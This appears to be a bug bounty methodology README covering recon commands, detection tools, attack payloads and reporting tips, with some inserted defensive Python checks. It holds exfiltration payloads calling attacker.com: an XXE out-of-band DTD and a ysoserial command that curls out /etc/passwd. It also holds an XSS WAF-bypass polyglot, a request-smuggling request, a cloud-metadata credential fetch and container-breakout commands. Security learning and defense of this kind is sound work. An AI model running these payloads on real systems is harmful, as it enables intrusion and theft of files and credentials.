A comprehensive collection of methodologies, tools, and techniques for modern bug hunters (2025 Edition)
Free resources for everyone to become a better bug hunter
Stay curious, hack ethically, and share knowledge freely!
- Introduction
- Reconnaissance Techniques
- Vulnerability Discovery
- Exploitation
- Post-Exploitation
- Reporting
- Resources
- Tools
- Contributing
- License
## Introduction

This repository contains a carefully curated collection of advanced methodologies, cutting-edge tools, and proven techniques for bug bounty hunting. Whether you're a beginner or an experienced security researcher, this resource will help elevate your hacking skills to the next level.
### Why Bug Bounty Hunting?
- Legal Way to Hack: Practice your skills in a legitimate environment
- Financial Rewards: Earn bounties while learning
- Career Growth: Build your resume with real-world experience
- Community: Join a global community of security researchers
- Impact: Help make the internet more secure for everyone
## Reconnaissance Techniques

Use a combination of these techniques for maximum coverage:

```bash
# Passive recon using multiple tools
subfinder -d target.com -all | anew subdomains.txt
amass enum -passive -d target.com | anew subdomains.txt
github-subdomains -d target.com -t GITHUB_TOKEN | anew subdomains.txt

# Permutation scanning
dnsgen subdomains.txt | puredns resolve -r resolvers.txt | anew resolved.txt

# Advanced brute forcing
ffuf -u https://FUZZ.target.com -w wordlist.txt -mc 200,403,301,302,307 -o ffuf_results.txt

# Screenshot the resolved hosts
cat resolved.txt | aquatone -out ./aquatone
gowitness file -f resolved.txt -P ./screenshots --no-http
```

### Comprehensive Asset Discovery
- **API Endpoint Discovery**

  ```bash
  katana -u target.com -jc | grep -E "api|graphql|v1|v2|v3" | anew api_endpoints.txt
  ```

- **JavaScript Analysis**

  ```bash
  nuclei -t js-endpoints.yaml -l resolved.txt -o js_endpoints.txt
  ```

- **Cloud Assets Discovery**

  ```bash
  cloudlist -o cloud_assets.txt -t target.com
  s3scanner scan -f domains.txt
  ```

- **CI/CD Environment Enumeration**

  ```bash
  gitGraber -k keywords.txt -q "org:targetorg"
  nuclei -t cicd-exposed.yaml -l resolved.txt
  ```

- **Mobile App Reverse Engineering**

  ```bash
  jadx -d output_dir target.apk
  grep -r "https://" ./output_dir
  ```
## Vulnerability Discovery

| Category | Vulnerability | Detection Method |
|---|---|---|
| API | GraphQL Introspection | `graphw00f -t https://api.target.com/graphql` |
| Auth | OAuth 2.0 Misconfiguration | `nuclei -t oauth-misconfiguration.yaml -l endpoints.txt` |
| Client-Side | DOM Clobbering | `gxss -u "https://target.com/?param=FUZZ" -p payloads.txt` |
| Server-Side | Server Side Template Injection | `tplmap -u "https://target.com/?param=FUZZ"` |
| Access Control | JWT Vulnerabilities | `jwt_tool.py -M at -t "JWT_TOKEN"` |
| Supply Chain | Dependency Confusion | `dependency-check --scan node_modules` |
### Advanced Testing Techniques

- **XSS Polyglots for Bypassing WAFs**

  ```text
  jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
  ```

- **Race Condition Testing**

  ```bash
  turbo-intruder race_condition.py https://target.com/api/endpoint
  ```

- **Advanced SSRF to RCE Chains**

  ```bash
  # Use Interactsh for SSRF detection
  interactsh-client
  # Then use the generated URL in your SSRF payloads
  # Example: https://target.com/api/fetch?url=http://INTERACTSH_URL/ssrf
  ```

- **GraphQL Query Batching Attack**

  ```json
  [{"query":"query{user{id name email}}","variables":null},{"query":"query{systemInfo}","variables":null}]
  ```

- **HTTP Request Smuggling**

  ```http
  POST / HTTP/1.1
  Host: target.com
  Transfer-Encoding: chunked
  Transfer-encoding: cow

  0

  GET /admin HTTP/1.1
  Host: target.com
  ```
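As an added, defender-side example (not code from this repository): the check a reverse proxy or WAF can apply to refuse requests like the TE.TE sample above before forwarding them. The sample requests are constructed inline.

```python
# Added example (not from the original repository): a front-end check that
# refuses requests carrying the header combinations request smuggling depends
# on (duplicate or obfuscated Transfer-Encoding, TE together with
# Content-Length). A proxy that answers these with 400 cannot be desynced
# from its back end by them.
import re

# Constructed samples: the TE.TE request shown above, and a normal POST.
SAMPLE_TE_TE = (
    b"POST / HTTP/1.1\r\nHost: target.com\r\n"
    b"Transfer-Encoding: chunked\r\nTransfer-encoding: cow\r\n\r\n"
    b"0\r\n\r\nGET /admin HTTP/1.1\r\nHost: target.com\r\n\r\n"
)
SAMPLE_CLEAN = b"POST / HTTP/1.1\r\nHost: target.com\r\nContent-Length: 2\r\n\r\nok"

def parse_headers(raw: bytes) -> list:
    """Return (name, value) pairs; whitespace is kept so obfuscation stays visible."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    pairs = []
    for line in head.split("\r\n")[1:]:        # skip the request line
        name, _, value = line.partition(":")
        pairs.append((name, value))
    return pairs

def smuggling_indicators(raw: bytes) -> list:
    """Reasons the request could desync a proxy/back-end pair (empty = clean)."""
    reasons = []
    te, cl = [], []
    for name, value in parse_headers(raw):
        if name != name.strip():                 # e.g. "Transfer-Encoding : chunked"
            reasons.append(f"whitespace around header name {name!r}")
        key = name.strip().lower()
        if key == "transfer-encoding":
            te.append(value)
        elif key == "content-length":
            cl.append(value)
    if len(te) > 1:
        reasons.append("duplicate Transfer-Encoding headers")
    for value in te:
        # Only "chunked" (optionally padded with spaces) is accepted; "cow",
        # "xchunked" or a tab-padded value can be read differently by the
        # front end and the back end, which is the whole TE.TE trick.
        if not re.fullmatch(r" *chunked *", value, re.IGNORECASE):
            reasons.append(f"non-standard Transfer-Encoding value {value!r}")
    if te and cl:
        reasons.append("Transfer-Encoding and Content-Length both present")
    if len(cl) > 1 or any(not v.strip().isdigit() for v in cl):
        reasons.append("duplicate or malformed Content-Length")
    return reasons
```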
XML External Entity (XXE) injection using an out-of-band DTD:

```xml
<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;]>
```

Evil.dtd:

```xml
<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/?data=%file;'>">
%all;
%send;
```

SQL injection automation:

```bash
# Time-based blind SQLi automation
sqlmap -u "https://target.com/page?id=1" --level=5 --risk=3 --batch --time-sec=1

# Second-order SQL injection
sqlmap -u "https://target.com/page1" --data="username=test&password=test" --second-url="https://target.com/page2" --second-req=req.txt
```
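As an added example (not code from this repository): the parser-side policy that stops the XXE payload above, written against the standard library. The sample documents are constructed inline.

```python
# Added example (not from the original repository): a parser front end that
# refuses the DOCTYPE/ENTITY declarations the XXE payload above depends on,
# so neither the /etc/passwd read nor the fetch of evil.dtd can occur.
# Standard library only; the same policy is what defusedxml enforces.
import re
import xml.etree.ElementTree as ET

# Constructed samples: the XXE document shown above (with a root element that
# uses the exfiltrating entity) and a harmless document.
XXE_DOC = (
    '<!DOCTYPE foo [\n'
    '<!ENTITY % file SYSTEM "file:///etc/passwd">\n'
    '<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">\n'
    '%dtd;]>\n<foo>&send;</foo>'
)
BENIGN_DOC = '<?xml version="1.0"?><order><id>42</id></order>'

# <!ENTITY can only appear inside a DOCTYPE, so matching DOCTYPE is enough;
# ENTITY is matched too so the intent is obvious. The check is deliberately
# fail-closed: a "<!DOCTYPE" inside a CDATA section is refused as well.
_FORBIDDEN = re.compile(r"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)

class UnsafeXML(ValueError):
    """Raised when a document declares a DTD or entities."""

def safe_parse(text: str) -> ET.Element:
    """Parse untrusted XML after refusing DTD/entity declarations.

    Rejecting the DTD up front is parser-independent: it also blocks internal
    entity expansion (billion laughs), which older expat builds perform even
    though expat does not fetch external entities by default.
    """
    m = _FORBIDDEN.search(text)
    if m:
        raise UnsafeXML(f"rejected {m.group(0)!r} at offset {m.start()}")
    return ET.fromstring(text)

def classify(text: str) -> str:
    """'rejected', 'parsed:<root tag>' or 'malformed', for quick checks."""
    try:
        return "parsed:" + safe_parse(text).tag
    except UnsafeXML:
        return "rejected"
    except ET.ParseError:
        return "malformed"
```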
### Zero-Day Hunting Techniques

- **Source Code Mining for Vulnerabilities**

  ```bash
  trufflehog --regex --entropy=False --max_depth=50 https://github.com/target/repo
  ```

- **Protocol-Level Fuzzing**

  ```bash
  # HTTP/2 Fuzzing
  h2csmuggler -u https://target.com/
  ```

- **Custom Deserialization Exploits**

  ```bash
  # Java deserialization payload generation
  java -jar ysoserial.jar CommonsCollections5 'curl attacker.com/$(cat /etc/passwd)' > payload.bin
  ```

- **WebSocket Security Testing**

  ```bash
  # Using wscat to connect to WebSocket
  wscat -c wss://target.com/ws
  # Then send payloads to test for vulnerabilities
  ```

- **IoT Firmware Analysis**

  ```bash
  binwalk -e firmware.bin
  grep -r "password" ./firmware_extracted/
  ```
## Exploitation

```bash
# Internal Service Discovery
curl internal-api.target.com/v1/users

# SSRF to access cloud metadata
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
```
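As an added example (not code from this repository): the server-side allow check that would refuse both fetches above when the URL comes from a user. The resolver is injectable so the check runs offline; the resolver mapping used in tests is constructed.

```python
# Added example (not from the original repository): a server-side allow check
# for user-supplied fetch URLs that blocks the cloud-metadata and internal
# targets shown above. The resolver is injectable so the check runs offline
# in tests; the default resolves through DNS.
import ipaddress
import socket
from urllib.parse import urlsplit

METADATA_HOSTS = {"169.254.169.254", "metadata.google.internal", "metadata"}

def _default_resolve(host: str) -> list:
    """All A/AAAA addresses for host (raises OSError if it does not resolve)."""
    return sorted({ai[4][0] for ai in socket.getaddrinfo(host, None)})

def _is_ip_literal(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def is_safe_fetch_target(url: str, resolve=_default_resolve) -> tuple:
    """Return (allowed, reason); fails closed on anything unexpected."""
    try:
        parts = urlsplit(url)
    except ValueError as exc:
        return False, f"unparseable URL: {exc}"
    if parts.scheme not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname or ""            # already lowercased, brackets stripped
    if not host:
        return False, "missing host"
    if host in METADATA_HOSTS:
        return False, "cloud metadata endpoint"
    try:
        # Non-literal hosts (including decimal/octal IP spellings) go through
        # the resolver, so the address actually dialled is what gets checked.
        addrs = [host] if _is_ip_literal(host) else resolve(host)
        for addr in addrs:
            ip = ipaddress.ip_address(addr)
            if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped:
                ip = ip.ipv4_mapped            # ::ffff:10.0.0.5 is still 10.0.0.5
            # is_global is False for private, loopback, link-local (which
            # includes 169.254.169.254), unique-local and reserved ranges.
            if not ip.is_global:
                return False, f"{addr} is not a public address"
    except (OSError, ValueError) as exc:
        return False, f"could not validate host: {exc}"
    # Caveat: the fetcher must connect to an address checked here (pin the IP,
    # re-check on every redirect) or DNS rebinding defeats the check.
    return True, "ok"
```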
### Internal Network Pivoting

- **Container Breakout Techniques**

  ```bash
  # Check if you're in a container
  cat /proc/1/cgroup
  # Mount host filesystem
  mkdir -p /tmp/host
  mount /dev/sda1 /tmp/host
  ```

- **JWT Token Pivoting**

  ```bash
  # Extract and modify JWT to escalate privileges
  jwt-cracker <token> [alphabet] [attempts]
  ```

- **Using GraphQL for Internal Recon**

  ```graphql
  query { __schema { types { name fields { name description } } } }
  ```
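As an added example (not code from this repository), covering both the JWT row in the detection table and the JWT Token Pivoting item above: a minimal HS256 verifier that rejects the modified, algorithm-swapped and expired tokens those tools produce. The secret and claims used are constructed sample values.

```python
# Added example (not from the original repository): a minimal HS256 JWT
# verifier that closes the holes the JWT tooling above probes for. The server
# fixes the algorithm itself, so "alg":"none" and algorithm-swap tokens fail;
# the MAC is compared in constant time; "exp" is enforced. Standard library
# only; the secret and claims used in tests are constructed sample values.
import base64
import hashlib
import hmac
import json
import time

def _b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def _b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()

def sign_hs256(claims: dict, secret: bytes) -> str:
    """Issue a token; used here to build inputs for the verifier."""
    header = _b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = _b64url_encode(json.dumps(claims).encode())
    mac = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url_encode(mac)}"

def verify_hs256(token: str, secret: bytes, now=None):
    """Return the claims dict if the token is valid, otherwise None."""
    try:
        header_b64, body_b64, sig_b64 = token.split(".")
        header = json.loads(_b64url_decode(header_b64))
        # The header's "alg" is only checked for agreement with the server's
        # fixed choice; it never selects the verification routine.
        if header.get("alg") != "HS256":
            return None
        expected = hmac.new(secret, f"{header_b64}.{body_b64}".encode(),
                            hashlib.sha256).digest()
        if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
            return None
        claims = json.loads(_b64url_decode(body_b64))
        current = time.time() if now is None else now
        if "exp" in claims and current >= claims["exp"]:
            return None
        return claims
    except (ValueError, TypeError, AttributeError):
        return None
```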
## Reporting

```markdown
# Vulnerability Report

## Overview
[Brief description of the vulnerability]

## Severity
[Critical/High/Medium/Low]

## Steps to Reproduce
1. [Step 1]
2. [Step 2]
3. [Step 3]

## Impact
[Describe what an attacker could do with this vulnerability]

## Proof of Concept
[Include screenshots, code, or videos]

## Remediation
[Recommendations for fixing the issue]
```

### Tips for Better Reports
- **Chain Multiple Vulnerabilities**
  - Show how combining low-severity issues can lead to critical impact
- **Include Business Impact**
  - Explain how the vulnerability affects the company's business
- **Create Proof of Concept Code**
  - Make it easy for the team to reproduce your findings
- **Provide Clear Remediation**
  - Give actionable advice on how to fix the issue
- **Follow Up Responsibly**
  - Be patient and professional in your communications
## Resources

- Real-World Bug Hunting by Peter Yaworski
- The Web Application Hacker's Handbook by Dafydd Stuttard
- Bug Bounty Bootcamp by Vickie Li
- Hands-On Bug Hunting by Joseph Marshall
## Tools

For a complete list of tools, see tools list.txt
### New Tools (2025)
- **Nuclei v3**
  - Advanced vulnerability scanner with machine learning capabilities

  ```bash
  nuclei -u https://target.com -t nuclei-templates
  ```

- **Katana v2**
  - Crawling and spidering framework with JS rendering

  ```bash
  katana -u https://target.com -jc -fs screens
  ```

- **Jaeles v2**
  - Advanced web application scanner

  ```bash
  jaeles scan -u https://target.com -s 'cves/,common/'
  ```

- **httpx v2**
  - Enhanced HTTP toolkit

  ```bash
  httpx -l domains.txt -title -tech-detect -status-code
  ```

- **Feroxbuster**
  - Fast content discovery tool

  ```bash
  feroxbuster -u https://target.com -w wordlist.txt
  ```

- **GF Patterns**
  - Pattern matcher for various vulnerabilities

  ```bash
  cat urls.txt | gf xss
  ```

- **dnsx**
  - Fast and multi-purpose DNS toolkit

  ```bash
  dnsx -l domains.txt -a -resp
  ```

- **Notify**
  - Notification service for bug bounty workflows

  ```bash
  notify -data "Target: example.com: XSS found"
  ```

- **ParamSpider**
  - Mining parameters from web archives

  ```bash
  python3 paramspider.py -d target.com
  ```

- **Dalfox v3**
  - Advanced XSS scanner

  ```bash
  dalfox url https://target.com?param=test
  ```
## Contributing

Contributions are welcome! Please feel free to submit a Pull Request, open an Issue, or suggest new resources.
## License

This project is licensed under the MIT License - see the LICENSE file for details.

Knowledge should be free and accessible to all.

Happy hacking!

